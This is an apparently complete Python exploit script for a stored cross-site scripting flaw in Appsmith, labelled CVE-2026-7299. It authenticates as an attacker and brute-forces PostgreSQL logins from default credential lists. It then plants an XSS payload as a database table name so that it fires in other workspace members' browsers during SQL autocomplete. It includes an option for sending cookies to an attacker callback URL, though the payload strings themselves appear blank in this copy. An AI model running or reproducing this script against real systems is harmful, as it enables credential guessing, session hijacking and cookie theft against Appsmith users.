#!/usr/bin/env python3 """ Appsmith Stored XSS via SQL Autocomplete (CVE-2026-7299) """ import argparse import json import random import string import sys import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class C: RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" BLUE = "\033[94m" PURPLE = "\033[95m" CYAN = "\033[96m" WHITE = "\033[97m" GREY = "\033[90m" BRED = "\033[1;91m" BGREEN = "\033[1;92m" BYELLOW = "\033[1;93m" BBLUE = "\033[1;94m" BPURPLE = "\033[1;95m" BCYAN = "\033[1;96m" BWHITE = "\033[1;97m" BOLD = "\033[1m" DIM = "\033[2m" END = "\033[0m" class out: @staticmethod def _pad(level): return " " * level @staticmethod def success(msg, level=1): print(f"{out._pad(level)}{C.BGREEN}\u2022{C.END} {msg}") @staticmethod def error(msg, level=1): print(f"{out._pad(level)}{C.BRED}\u2022{C.END} {C.RED}{msg}{C.END}") @staticmethod def warn(msg, level=1): print(f"{out._pad(level)}{C.BYELLOW}\u2022{C.END} {C.YELLOW}{msg}{C.END}") @staticmethod def info(msg, level=1): print(f"{out._pad(level)}{C.BCYAN}\u2022{C.END} {msg}") @staticmethod def step(msg, level=1): print(f"{out._pad(level)}{C.BPURPLE}\u2022{C.END} {msg}") @staticmethod def detail(label, value, level=2): print(f"{out._pad(level)}{C.GREY}\u2022 {label}:{C.END} {value}") @staticmethod def dim(msg, level=2): print(f"{out._pad(level)}{C.GREY}\u2022 {msg}{C.END}") @staticmethod def progress(msg, level=2): pad = out._pad(level) sys.stdout.write(f"\r{pad}{C.GREY}\u2022 {msg}{C.END}\033[K") sys.stdout.flush() @staticmethod def blank(): print() BANNER = f''' {C.PURPLE}M""MMMM""M MP""""""`MM MP""""""`MM {C.END} {C.BOLD} MP""""""`MM M"""""`'"""`YM M""M M""""""""M M""MMMMM""MM {C.PURPLE}M `MM' M M mmmmm..M M mmmmm..M {C.END} {C.BOLD}M mmmmm..M M mm. mm. M M M Mmmm mmmM M MMMMM MM {C.PURPLE}MM. .MM M. `YM M. `YM {C.END} {C.BOLD}M. `YM M MMM MMM M M M MMMM MMMM M `M {C.PURPLE}M .mm. M MMMMMMM. M MMMMMMM. M {C.END} {C.BOLD}MMMMMMM. M M MMM MMM M M M MMMM MMMM M MMMMM MM {C.PURPLE}M MMMM M M. .MMM' M M. .MMM' M {C.END} {C.BOLD}M. .MMM' M M MMM MMM M M M MMMM MMMM M MMMMM MM {C.PURPLE}M MMMM M Mb. .dM Mb. .dM {C.END} {C.BOLD}Mb. .dM M MMM MMM M M M MMMM MMMM M MMMMM MM {C.PURPLE}MMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMM {C.END} {C.BOLD}MMMMMMMMMMM MMMMMMMMMMMMMM MMMM MMMMMMMMMM MMMMMMMMMMMM {C.BGREEN}@stuub{C.END} Exploiting CVE-2026-7299 Stored XSS - Appsmith v1.98 ''' PAYLOADS = { "alert": '', } class AppsmithExploit: def __init__(self, base_url, email, password, verify_ssl=False): self.base_url = base_url.rstrip("/") self.email = email self.password = password self.session = requests.Session() self.session.verify = verify_ssl self.xsrf_token = None def _headers(self): h = {"Content-Type": "application/json"} if self.xsrf_token: h["X-XSRF-TOKEN"] = self.xsrf_token return h def _update_xsrf(self, response): token = response.cookies.get("XSRF-TOKEN") if token: self.xsrf_token = token def login(self): out.step("Authenticating...") r = self.session.get(f"{self.base_url}/api/v1/users/me") self._update_xsrf(r) r = self.session.post( f"{self.base_url}/api/v1/login", headers={"Content-Type": "application/x-www-form-urlencoded", "X-XSRF-TOKEN": self.xsrf_token or ""}, data={"username": self.email, "password": self.password}, allow_redirects=False, ) self._update_xsrf(r) if r.status_code not in (200, 301, 302): out.error("Login failed", level=2) out.dim(r.text[:200]) sys.exit(1) r = self.session.get(f"{self.base_url}/api/v1/users/me", headers=self._headers()) self._update_xsrf(r) data = r.json() if data.get("data", {}).get("isAnonymous", True): out.error("Login failed, still anonymous", level=2) sys.exit(1) email = data["data"].get("email", "unknown") out.success(f"Authenticated as {C.BGREEN}{email}{C.END}", level=2) return data["data"] def get_workspace_context(self): suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) out.step("Setting up workspace...") r = self.session.post( f"{self.base_url}/api/v1/workspaces", headers=self._headers(), json={"name": f"poc-{suffix}"}) self._update_xsrf(r) if r.status_code not in (200, 201): out.warn(f"Workspace creation failed ({r.status_code}), using existing", level=2) r = self.session.get(f"{self.base_url}/api/v1/workspaces/home", headers=self._headers()) self._update_xsrf(r) workspaces = r.json().get("data", []) if not workspaces: out.error("No workspaces found", level=2) sys.exit(1) workspace = workspaces[0] else: workspace = r.json()["data"] workspace_id = workspace["id"] out.success(f"Workspace {C.BWHITE}{workspace.get('name', 'N/A')}{C.END}", level=2) r = self.session.post( f"{self.base_url}/api/v1/applications", headers=self._headers(), json={"name": f"app-{suffix}", "workspaceId": workspace_id}) self._update_xsrf(r) if r.status_code not in (200, 201): out.error(f"Failed to create application: {r.status_code}", level=2) sys.exit(1) app = r.json()["data"] app_id = app["id"] pages = app.get("pages", []) if not pages: out.error("No pages found", level=2) sys.exit(1) page_id = pages[0].get("id") or pages[0].get("baseId") out.success(f"Application {C.BWHITE}{app.get('name', 'N/A')}{C.END}", level=2) return workspace_id, app_id, page_id def find_postgres_datasource(self, workspace_id): out.step("Searching for writable PostgreSQL datasources...") r = self.session.get( f"{self.base_url}/api/v1/datasources?workspaceId={workspace_id}", headers=self._headers()) self._update_xsrf(r) resp = r.json() if resp.get("responseMeta", {}).get("status") != 200: out.warn("Datasource listing failed", level=2) return None for ds in resp.get("data", []): if ds.get("pluginName", "").lower() == "postgresql": storages = ds.get("datasourceStorages", {}) for _, storage in storages.items(): config = storage.get("datasourceConfiguration", {}) mode = config.get("connection", {}).get("mode", "READ_WRITE") if mode == "READ_WRITE": out.success(f"Found {C.BCYAN}{ds['name']}{C.END}", level=2) return ds out.dim(f"{ds['name']} is READ_ONLY, skipping", level=2) out.warn("No writable PostgreSQL datasource found", level=2) return None dfl_db_hosts = [ "host.docker.internal", "172.17.0.1", "postgres", "postgresql", "db", "database", "appsmith-pg", "localhost", ] dfl_db_ports = [5432] dfl_db_names = ["postgres", "testdb", "appsmith"] dfl_db_user = ["postgres", "appsmith", "admin"] dfl_db_pass = ["postgres", "password", "test123", "appsmith", "admin"] def test_datasource_connection(self, plugin_id, workspace_id, host, port, db_name, username, password): payload = { "pluginId": plugin_id, "datasourceConfiguration": { "connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}}, "endpoints": [{"host": host, "port": port}], "authentication": { "databaseName": db_name, "username": username, "password": password, }, "properties": [None, {"key": "Connection method", "value": "STANDARD"}], }, "workspaceId": workspace_id, } headers = self._headers() headers["X-Appsmith-EnvironmentId"] = "unused_env" try: r = self.session.post( f"{self.base_url}/api/v1/datasources/test", headers=headers, json=payload, timeout=10) self._update_xsrf(r) return r.json().get("data", {}).get("success", False) except Exception: return False def auto_discover_datasource(self, workspace_id, db_host=None, db_port=None, db_name=None, db_user=None, db_pass=None): out.step("Auto-discovering PostgreSQL connection...") plugin_id = self.get_postgres_plugin_id(workspace_id) hosts = [db_host] if db_host else self.dfl_db_hosts ports = [db_port] if db_port else self.dfl_db_ports names = [db_name] if db_name else self.dfl_db_names users = [db_user] if db_user else self.dfl_db_user passes = [db_pass] if db_pass else self.dfl_db_pass for host in hosts: for port in ports: for name in names: for user in users: for pwd in passes: combo = f"{user}:{pwd}@{host}:{port}/{name}" out.progress(f"Trying {combo:<50}") if self.test_datasource_connection( plugin_id, workspace_id, host, port, name, user, pwd): print() out.success(f"Connection found {C.BGREEN}{combo}{C.END}", level=2) return self.create_datasource( workspace_id, host, port, name, user, pwd) print() out.error("No valid PostgreSQL connection found", level=2) out.dim("Provide credentials with --db-host, --db-user, --db-pass, --db-name") sys.exit(1) def get_postgres_plugin_id(self, workspace_id): r = self.session.get( f"{self.base_url}/api/v1/plugins?workspaceId={workspace_id}", headers=self._headers()) self._update_xsrf(r) for p in r.json().get("data", []): pname = p.get("name", "").lower() pkg = p.get("packageName", "").lower() if "postgres" in pname or "postgres" in pkg: return p["id"] out.error("PostgreSQL plugin not found", level=2) sys.exit(1) def create_datasource(self, workspace_id, db_host, db_port, db_name, db_user, db_pass): out.step(f"Creating datasource {C.BWHITE}{db_host}:{db_port}/{db_name}{C.END}", level=2) plugin_id = self.get_postgres_plugin_id(workspace_id) payload = { "pluginId": plugin_id, "datasourceStorages": { "unused_env": { "datasourceConfiguration": { "properties": [ None, {"key": "Connection method", "value": "STANDARD"} ], "connection": { "mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"} }, "endpoints": [{"port": str(db_port), "host": db_host}], "sshProxy": {"endpoints": [{"port": "22"}]}, "authentication": { "databaseName": db_name, "username": db_user, "password": db_pass, }, "url": "", }, "datasourceId": "", "environmentId": "unused_env", "isConfigured": True, } }, "name": f"ds-{workspace_id[:8]}", "workspaceId": workspace_id, } r = self.session.post(f"{self.base_url}/api/v1/datasources", headers=self._headers(), json=payload) self._update_xsrf(r) if r.status_code != 201: out.error(f"Failed to create datasource: {r.status_code}", level=3) out.dim(r.text[:300], level=3) sys.exit(1) ds = r.json()["data"] out.success(f"Datasource created {C.GREY}({ds['id']}){C.END}", level=3) return ds def create_action(self, datasource, app_id, page_id, workspace_id, xss_payload): out.step("Injecting XSS payload...") sql = f'CREATE TABLE "{xss_payload}" (id serial primary key);' payload = { "applicationId": app_id, "workspaceId": workspace_id, "pluginType": "DB", "pluginId": datasource["pluginId"], "datasource": { "id": datasource["id"], "name": datasource["name"], "pluginId": datasource["pluginId"], }, "pageId": page_id, "actionConfiguration": { "timeoutInMillisecond": 10000, "paginationType": "NONE", "encodeParamsToggle": True, "pluginSpecifiedTemplates": [{"value": True}], "body": sql, }, "name": "xss_poc_query", } r = self.session.post(f"{self.base_url}/api/v1/actions", headers=self._headers(), json=payload) self._update_xsrf(r) if r.status_code not in (200, 201): out.error(f"Failed to create action: {r.status_code}", level=2) out.dim(r.text[:500], level=2) sys.exit(1) action = r.json()["data"] out.success(f"Action created {C.GREY}({action['id']}){C.END}", level=2) out.detail("SQL", f"{C.BWHITE}{sql}{C.END}") return action["id"] def execute_action(self, action_id): out.step("Executing query...", level=2) execute_dto = json.dumps({ "actionId": action_id, "viewMode": False, "paramProperties": {}, }) body = ( f"------ExploitBoundary\r\n" f'Content-Disposition: form-data; name="executeActionDTO"\r\n' f"\r\n" f"{execute_dto}\r\n" f"------ExploitBoundary--\r\n" ) headers = { "Content-Type": "multipart/form-data; boundary=----ExploitBoundary", "X-Appsmith-EnvironmentId": "unused_env", } if self.xsrf_token: headers["X-XSRF-TOKEN"] = self.xsrf_token r = self.session.post( f"{self.base_url}/api/v1/actions/execute", headers=headers, data=body.encode()) self._update_xsrf(r) if r.status_code != 200: out.error(f"Execution failed: {r.status_code}", level=3) sys.exit(1) result = r.json() success = result.get("data", {}).get("isExecutionSuccess", False) if success: out.success("Malicious table created", level=3) else: error = result.get("data", {}).get("body", "Unknown error") if "already exists" in str(error): out.warn("Table already exists (payload previously injected)", level=3) else: out.error(f"Query error: {error}", level=3) sys.exit(1) return success def refresh_structure(self, datasource_id): out.step("Refreshing datasource structure...") r = self.session.get( f"{self.base_url}/api/v1/datasources/{datasource_id}/structure" f"?ignoreCache=true", headers=self._headers()) self._update_xsrf(r) if r.status_code == 200: tables = r.json().get("data", {}).get("tables", []) out.success(f"{C.BWHITE}{len(tables)}{C.END} tables loaded into autocomplete", level=2) for t in tables: name = t.get("name", "") if "<" in name or "onerror" in name: out.success(f"Poisoned table: {C.BGREEN}{name[:70]}{C.END}", level=2) return True else: out.warn(f"Structure refresh returned {r.status_code}", level=2) return True def run(self, xss_payload, db_host=None, db_port=None, db_name=None, db_user=None, db_pass=None): self.login() out.blank() workspace_id, app_id, page_id = self.get_workspace_context() out.blank() ds = self.find_postgres_datasource(workspace_id) if not ds: ds = self.auto_discover_datasource( workspace_id, db_host, db_port, db_name, db_user, db_pass) out.blank() action_id = self.create_action(ds, app_id, page_id, workspace_id, xss_payload) self.execute_action(action_id) out.blank() self.refresh_structure(ds["id"]) out.blank() out.success(f"{C.BGREEN}Exploit complete{C.END}") out.dim("XSS payload stored as a database table name.") out.dim("Will fires when a workspace member triggers SQL autocomplete.") out.blank() out.detail("Trigger", f"Type {C.BWHITE}SELECT * FROM{C.END} in the SQL editor") out.detail("Payload", f"{C.BWHITE}{xss_payload}{C.END}") out.detail("Datasource", f"{C.BWHITE}{ds['name']}{C.END} {C.GREY}({ds['id']}){C.END}") out.blank() def main(): print(BANNER) parser = argparse.ArgumentParser( description="CVE-2026-7299 - Appsmith Stored XSS via SQL Autocomplete") parser.add_argument("-u", "--url", required=True, help="Appsmith base URL (e.g. http://localhost:4444)") parser.add_argument("-e", "--email", required=True, help="Attacker's Appsmith email") parser.add_argument("-p", "--password", required=True, help="Attacker's Appsmith password") parser.add_argument("-c", "--callback-url", help="Callback URL for cookie exfiltration") parser.add_argument("-x", "--custom-payload", help="Custom XSS payload string") parser.add_argument("-H", "--db-host", help="PostgreSQL host") parser.add_argument("-P", "--db-port", type=int, default=5432, help="PostgreSQL port (default: 5432)") parser.add_argument("-d", "--db-name", help="PostgreSQL database name") parser.add_argument("-U", "--db-user", help="PostgreSQL username") parser.add_argument("-W", "--db-pass", help="PostgreSQL password") parser.add_argument("-k", "--no-verify-ssl", action="store_true", help="Disable SSL verification") args = parser.parse_args() if args.custom_payload: xss_payload = args.custom_payload if len(xss_payload) > 63: out.warn(f"Custom payload is {len(xss_payload)} chars (PostgreSQL limit: 63)") out.dim("Payload will be truncated by the database") elif args.callback_url: cb = args.callback_url.rstrip("/") short_cb = cb.replace("https://", "//").replace("http://", "//") candidates = [ f"", f"", f"", ] xss_payload = None for c in candidates: if len(c) <= 63: xss_payload = c if not xss_payload: max_url = 63 - len("") out.error("Callback URL too long for PostgreSQL 63-char identifier limit") out.dim(f"Max URL length: ~{max_url} chars (yours: {len(short_cb)})") out.dim("Use port 80 or a short domain/ngrok URL") sys.exit(1) out.info(f"Callback: {C.BWHITE}{xss_payload}{C.END} {C.GREY}({len(xss_payload)}/63){C.END}") else: xss_payload = PAYLOADS["alert"] out.blank() exploit = AppsmithExploit( base_url=args.url, email=args.email, password=args.password, verify_ssl=not args.no_verify_ssl, ) exploit.run( xss_payload=xss_payload, db_host=args.db_host, db_port=args.db_port, db_name=args.db_name, db_user=args.db_user, db_pass=args.db_pass, ) if __name__ == "__main__": try: main() except KeyboardInterrupt: print(f"\n\n {C.BYELLOW}\u2022{C.END} {C.GREY}Interrupted.{C.END}\n") sys.exit(0)